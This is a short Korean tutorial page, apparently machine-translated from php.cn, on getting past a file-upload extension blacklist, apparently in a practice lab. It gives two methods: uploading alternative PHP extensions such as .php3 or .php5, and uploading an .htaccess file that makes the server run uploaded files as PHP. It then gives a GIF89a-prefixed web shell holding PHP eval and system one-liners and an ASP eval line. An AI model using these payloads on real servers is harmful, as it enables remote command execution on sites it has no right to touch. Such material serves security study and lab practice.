파일 업로드 시 블랙리스트를 우회하는 방법

不言
풀어 주다: 2023-04-02 14:20:02
원래의
6122명이 탐색했습니다.

이 글에서는 주로 파일 업로드를 통해 블랙리스트를 우회하는 방법을 소개합니다. 이제 특정 참조 가치가 있어 공유합니다. 도움이 필요한 친구들이 참고할 수 있습니다.

이 레벨은 주로 업로드 접미사를 설정하고, asp, php, jsp 등의 접미사는 업로드할 수 없습니다.

위치 1: 이 우회 방법은 접미사를 .php3, php5 등으로 수정하는 것입니다. 여기에 블랙리스트 확인('.asp', '.aspx', '.php', '.jsp')이 있습니다. php3, php5... 및 서버에서 구문 분석할 수 있는 기타 접미사 이름을 업로드하세요

위치 2: 우회하도록 파일 구문 분석 규칙을 다시 작성

1. 먼저 다음 내용을 포함하는 .htaccess이라는 파일을 업로드하세요. :

SetHandler application/x-httpd-php

2. 스크립트

내용:

GIF89a
<?php eval($_POST[&#39;joker&#39;]);?>
<%eval request("joker")%>
<?php system($_POST[&#39;cmd&#39;]);?>
로그인 후 복사

<span   style="max-width:90%"><br/>最后查看结果如下:<br/><img src="https://img.php.cn/upload/article/000/000/009/8c177c6b99f31ac79c542a12d4053de9-3.png" alt=""/><br/></span>
로그인 후 복사

이상이 이 글의 전체 내용입니다. 더 많은 관련 내용을 보시려면 PHP 중국어 웹사이트를 주목해주세요!

관련 권장 사항:

PHP는 Azure Storage Blob을 사용하여 파일을 업로드합니다

nginx memcache 캐시 소개

위 내용은 파일 업로드 시 블랙리스트를 우회하는 방법의 상세 내용입니다. 자세한 내용은 PHP 중국어 웹사이트의 기타 관련 기사를 참조하세요!

관련 라벨:
원천:php.cn
본 웹사이트의 성명
본 글의 내용은 네티즌들의 자발적인 기여로 작성되었으며, 저작권은 원저작자에게 있습니다. 본 사이트는 이에 상응하는 법적 책임을 지지 않습니다. 표절이나 침해가 의심되는 콘텐츠를 발견한 경우 admin@php.cn으로 문의하세요.
최신 이슈
인기 튜토리얼
더>
최신 다운로드
더>
웹 효과
웹사이트 소스 코드
웹사이트 자료
프론트엔드 템플릿